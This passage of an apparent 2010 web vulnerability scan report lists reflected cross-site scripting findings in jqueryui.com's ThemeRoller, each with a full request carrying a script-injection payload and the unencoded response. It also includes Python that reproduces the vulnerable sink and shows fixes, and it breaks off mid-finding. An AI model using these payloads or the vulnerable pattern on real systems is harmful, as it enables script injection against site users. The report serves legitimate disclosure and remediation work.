GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&
...[SNIP]...

3.184. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload 5253d"><script>alert(1)</script>c643bd72dbb was submitted in the iconColorDefault parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ontent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpaci
...[SNIP]...

3.185. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload aadc9"><script>alert(1)</script>93993d12d9 was submitted in the iconColorError parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.186. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload 38ce9"><script>alert(1)</script>9fcb678b763 was submitted in the iconColorHeader parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard
...[SNIP]...

3.187. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload 67aae"><script>alert(1)</script>d3e33429518 was submitted in the iconColorHighlight parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.188. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload 164db"><script>alert(1)</script>6a00d66429c was submitted in the iconColorHover parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string, parameter names included, back in the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php. The payload 2c71b"><script>alert(1)</script>cc48d1bc9db was submitted as the name of a parameter that the application does not define, and it appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. It also shows that the root cause is a single sink rather than any one parameter: validating the named ThemeRoller parameters individually would leave this vector open, so the fix belongs at the point where the href is built, by encoding the attribute value or by rebuilding the query from known parameter names only.

Request

GET /themeroller/?2c71b"><script>alert(1)</script>cc48d1bc9db=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:08:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&2c71b"><script>alert(1)</script>cc48d1bc9db=1" type="text/css" media="all" />
...[SNIP]...
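The sink behind every /themeroller/ finding in this section is the same: the raw query string is concatenated into the href of the stylesheet link, so a double quote in any parameter name or value breaks out of the attribute. The following Python is an added example, not code from jqueryui.com or from this report; it reproduces that sink (so the reflected tag for the parameter-name probe above can be regenerated exactly), shows the minimal fix of encoding for the attribute context, and then a hardened rebuild that only re-emits known parameter names whose values match an expected shape. The allow-list, the value shapes and the function names are assumptions made for illustration; the application itself is PHP, where the attribute encoding step is htmlspecialchars($s, ENT_QUOTES).

```python
"""Attribute-context reflected XSS at the ThemeRoller stylesheet href.

Added example, not code from jqueryui.com or from the scan report. It
reproduces the sink the report's responses show (the raw query string
concatenated into a double-quoted href) and contrasts it with a hardened
rebuild. The parameter allow-list and value shapes are assumptions.
"""
import html
import re
from urllib.parse import parse_qsl, urlencode

STYLESHEET = "/themeroller/css/parseTheme.css.php"

# The probe string the report submitted in fwDefault, reused as constructed input.
PROBE = '36130"><script>alert(1)</script>7eb2177a8ce'


def vulnerable_link(raw_query):
    """The pattern behind every finding: nothing encodes the query string, so
    a double quote in any parameter name or value ends the href attribute and
    the following > ends the <link> tag."""
    return ('<link rel="stylesheet" href="%s?ctl=themeroller&%s" '
            'type="text/css" media="all" />' % (STYLESHEET, raw_query))


def escape_only_link(raw_query):
    """Minimal fix: encode for the HTML attribute context. quote=True turns
    the double quote into &quot; so the attribute cannot be closed early.
    PHP equivalent: htmlspecialchars($s, ENT_QUOTES)."""
    href = html.escape("%s?ctl=themeroller&%s" % (STYLESHEET, raw_query), quote=True)
    return '<link rel="stylesheet" href="%s" type="text/css" media="all" />' % href


# Assumed value shapes for the parameter families seen in the report's requests.
HEX_COLOUR = re.compile(r"[0-9a-fA-F]{6}|[0-9a-fA-F]{3}")
PX_LENGTH = re.compile(r"-?\d{1,3}px")
PERCENT = re.compile(r"100|[1-9]?\d")
TEXTURE = re.compile(r"\d{2}_[a-z_]+\.png")
FONT_LIST = re.compile(r"[A-Za-z0-9 ,-]{1,80}")
FONT_WEIGHT = re.compile(r"normal|bold|bolder|lighter|[1-9]00")

# Widget states that complete the prefixed parameter names (bgColorHeader, ...).
STATES = ("Header", "Content", "Default", "Hover", "Active",
          "Highlight", "Error", "Overlay", "Shadow")
PREFIXED = {"bgColor": HEX_COLOUR, "borderColor": HEX_COLOUR, "fc": HEX_COLOUR,
            "iconColor": HEX_COLOUR, "bgTexture": TEXTURE,
            "bgImgOpacity": PERCENT, "opacity": PERCENT}
EXACT = {"ffDefault": FONT_LIST, "fwDefault": FONT_WEIGHT, "fsDefault": PX_LENGTH,
         "cornerRadius": PX_LENGTH, "cornerRadiusShadow": PX_LENGTH,
         "thicknessShadow": PX_LENGTH, "offsetTopShadow": PX_LENGTH,
         "offsetLeftShadow": PX_LENGTH}


def shape_for(name):
    """Validator for a known ThemeRoller parameter name, or None if unknown."""
    if name in EXACT:
        return EXACT[name]
    for prefix, shape in PREFIXED.items():
        if name.startswith(prefix) and name[len(prefix):] in STATES:
            return shape
    return None


def safe_link(raw_query):
    """Hardened rebuild: keep only known names whose values match their shape,
    regenerate the query with percent-encoding, then encode for the attribute.
    Dropping unknown names closes the arbitrary-parameter-name vector;
    html.escape closes the attribute-breakout vector for the values kept."""
    kept = []
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        shape = shape_for(name)
        if shape is not None and shape.fullmatch(value):
            kept.append((name, value))
    query = urlencode([("ctl", "themeroller")] + kept)
    href = html.escape("%s?%s" % (STYLESHEET, query), quote=True)
    return '<link rel="stylesheet" href="%s" type="text/css" media="all" />' % href


def script_breaks_out(markup):
    """Re-test check: True if a literal <script tag survives in the markup,
    which is what a browser would execute. Encoded &lt;script&gt; does not count."""
    return re.search(r"<script\b", markup) is not None


if __name__ == "__main__":
    probe_query = ("ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold"
                   + PROBE + "&fsDefault=12px")
    for build in (vulnerable_link, escape_only_link, safe_link):
        print(build.__name__, "breaks out:", script_breaks_out(build(probe_query)))
```

The same script_breaks_out check is what to run when re-testing after a fix: request /themeroller/ with one of the report's probes and search the body for a literal <script that you supplied. escape_only_link is enough to stop the breakout, because the encoded double quote can no longer end the attribute; safe_link is the defence-in-depth version that additionally stops unknown parameter names from ever reaching the page and keeps the generated stylesheet URL well-formed.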

3.190. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php. The payload 6f8ed"><script>alert(1)</script>e7a1c93907c was submitted in the offsetLeftShadow parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.191. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php. The payload 85bb8"><script>alert(1)</script>18668a6627e was submitted in the offsetTopShadow parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

